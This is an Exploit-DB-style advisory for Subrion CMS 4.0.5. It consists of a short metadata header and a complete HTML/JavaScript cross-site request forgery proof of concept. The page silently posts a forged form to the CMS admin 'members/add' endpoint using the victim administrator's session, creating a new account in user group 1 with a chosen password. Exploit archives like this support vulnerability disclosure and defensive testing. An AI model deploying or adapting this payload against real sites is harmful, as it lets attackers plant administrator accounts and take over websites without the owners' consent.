exploit-db-mirror/exploits/php/webapps/47851.txt

# Exploit Title:  Subrion CMS 4.0.5 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-01-05
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://intelliants.com/
# Software Link : https://github.com/intelliants/subrion/releases/tag/v4.0.5
# Software : Subrion CMS
# Product Version: v 4.0.5.10
# Vulernability Type : Cross-Site Request Forgery (Add Admin)
# Vulenrability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# CSRF vulnerability was discovered in v4.0.5 version of Subrion CMS.
# With this vulnerability, authorized users can be added to the system.

HTML CSRF PoC :

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https:\/\/SERVER\/_core\/admin\/members\/add\/", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------9973334999367242361642875270");
        xhr.withCredentials = true;
        var body = "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"__st\"\r\n" +
          "\r\n" +
          "41209a5f43b0d7c8cef0e7ffcd9ce160\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"username\"\r\n" +
          "\r\n" +
          "ismailtasdelen\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"fullname\"\r\n" +
          "\r\n" +
          "Ismail Tasdelen\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"email\"\r\n" +
          "\r\n" +
          "test@mail.com\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"_password\"\r\n" +
          "\r\n" +
          "Test1234!\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"_password2\"\r\n" +
          "\r\n" +
          "Test1234!\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
          "\r\n" +
          "1\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
          "Content-Type: application/octet-stream\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"website\"\r\n" +
          "\r\n" +
          "https://ismailtasdelen.com\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"phone\"\r\n" +
          "\r\n" +
          "0000000000000000000\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"biography\"\r\n" +
          "\r\n" +
          "NULL\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"facebook\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"twitter\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"gplus\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"linkedin\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"sponsored\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"plan_id\"\r\n" +
          "\r\n" +
          "2\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"sponsored_end\"\r\n" +
          "\r\n" +
          "2020-02-05 05:18:43\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"featured\"\r\n" +
          "\r\n" +
          "0\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"featured_end\"\r\n" +
          "\r\n" +
          "2020-02-05 05:19\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"status\"\r\n" +
          "\r\n" +
          "active\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"save\"\r\n" +
          "\r\n" +
          "Add\r\n" +
          "-----------------------------9973334999367242361642875270\r\n" +
          "Content-Disposition: form-data; name=\"goto\"\r\n" +
          "\r\n" +
          "list\r\n" +
          "-----------------------------9973334999367242361642875270--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>